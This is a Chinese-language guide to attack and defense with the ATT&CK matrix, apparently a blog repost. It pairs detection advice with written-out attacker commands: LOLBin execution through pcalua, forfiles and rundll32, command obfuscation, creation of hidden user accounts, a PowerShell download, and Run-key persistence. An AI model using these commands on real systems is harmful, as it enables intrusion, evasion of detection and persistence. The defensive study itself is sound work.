ATT&CK矩阵的攻与防
字数 1077 2025-08-27 12:33:23
ATT&CK矩阵攻防实战指南
前言
ATT&CK框架是安全领域广泛使用的战术技术知识库,它将攻击者使用的技术以TTPs(战术、技术和程序)形式展现。本指南将从攻防双方视角深入分析ATT&CK矩阵的实际应用,提供可落地的技术方案。
执行阶段的攻防对抗
攻击者常用执行技术
-
文件扩展名替换
- 使用非标准扩展名绕过检测:ps1, bat, vbs, dll, hta等
- 示例:将恶意代码保存为.ps1而非.exe
-
语言脚本执行
- 利用各种脚本语言执行系统命令:
python3 -c "import os;output=os.popen('C:/Users/xinxin/Desktop/mmm.exe');" - 其他语言:aspx, php, java, node.js等
- 利用各种脚本语言执行系统命令:
-
第三方服务滥用
- 利用合法软件执行恶意代码:7zip, WinRAR等
- 防御难点:难以直接拉黑常用办公软件
-
白+黑技术
- 利用系统合法组件执行恶意代码:
- pcalua.exe:
Pcalua -m -a axgg.exe - forfiles.exe:
forfiles -P c:\windows\ /m *.prx /c "cmd /c c:\users\axingg\desktop\axgg.exe - rundll32.exe多种变形:
rundll32 advpack.dll RegisterOCX axgg.exe rundll32 url.dll,FileProtocolHandler file://C:\Users\axingg\Desktop\axgg.exe rundll32 url.dll,OpenURL axgg.exe rundll32 zipfldr.dll, RouteTheCall axgg.exe rundll32 javascript:"..\mshtml,RunHTMLApplication ";document.write("\74script language=javascript)"+(new%20ActiveXObject("WScript.Shell")).Run("axgg.exe")+"\74/script)")
- pcalua.exe:
- 利用系统合法组件执行恶意代码:
-
命令混淆技术
- 替换技术:
- 环境变量替换:
P%comspec:~20,1%alua -m -a axgg.%comspec:~24,1%x%comspec:~24,1% - 特殊字符替换:
forfiles /ᵖᵖᵖ c:\windows\ /m .prx /c "cmd /c c:\users\axingg\desktop\axgg.exe
- 环境变量替换:
- 缩短技术:
- 命令缩写:
net1 user axgg 123456 /ad - PowerShell命令缩写:
iwr -uri http://192.168.1.28:1456/test.txt -o test.txt
- 命令缩写:
- 拼接技术:
set a1=er la&& set a2=ne&& set a3=t us&& set a4=cker qaz2022&& set a5=WSX /a&& set a6=d&&call echo %a2%%a3%%a1%%a4%%a5%%a6%
- 替换技术:
防御方案设计
-
进程白名单机制
- 限制特定进程(如7zip)启动子进程
- 实施难度:需要完善的企业基础设施支持
-
命令参数检测
- 检测异常参数组合
- 示例:检测pcalua的异常使用
-
注册表操作监控
- 监控关键注册表项修改:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run - 防御绕过技术:
- 攻击者可能使用
reg import替代直接修改
- 攻击者可能使用
- 监控关键注册表项修改:
-
PowerShell防护策略
- 可选检测方案:
- 匹配已知恶意脚本特征(如PowerSploit, Empire)
- 基于功能检测(下载、执行、-bypass等参数)
- 实施微软PowerShell语言限制模式
- 可选检测方案:
权限维持技术分析
常见技术
-
注册表自启动
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v axgg /t REG_SZ /d "C:\Users\axgg\evil.exe" -
计划任务
- 检测难点:区分合法与恶意计划任务
防御方案
-
注册表变更监控
- 重点关注常见持久化位置
- 检测异常修改行为
-
计划任务审计
- 建立基线,检测异常任务创建
- 结合其他指标判断恶意性
ATT&CK落地实践要点
-
检测规则设计考量
- 准确率、误报率、召回率评估
- 规则有效性验证(能否检测真实攻击)
-
安全运营基础设施
- 支持ATT&CK框架的平台建设
- 安全人员能力培养
-
攻防对抗思维
- 从攻击者视角测试防御体系
- 持续优化检测规则
-
多维度关联分析
- 单一行为难以判定恶意性
- 需要结合多个TTPs进行判断
总结
ATT&CK框架的有效应用需要:
- 深入理解各TTPs的实际表现形式
- 设计多层次的检测规则
- 建立完善的运营体系
- 持续进行攻防对抗测试
- 保持对新型绕过技术的研究
安全防御不是静态的规则集合,而是动态的对抗过程。防守方需要不断从攻击中学习,优化检测和响应能力。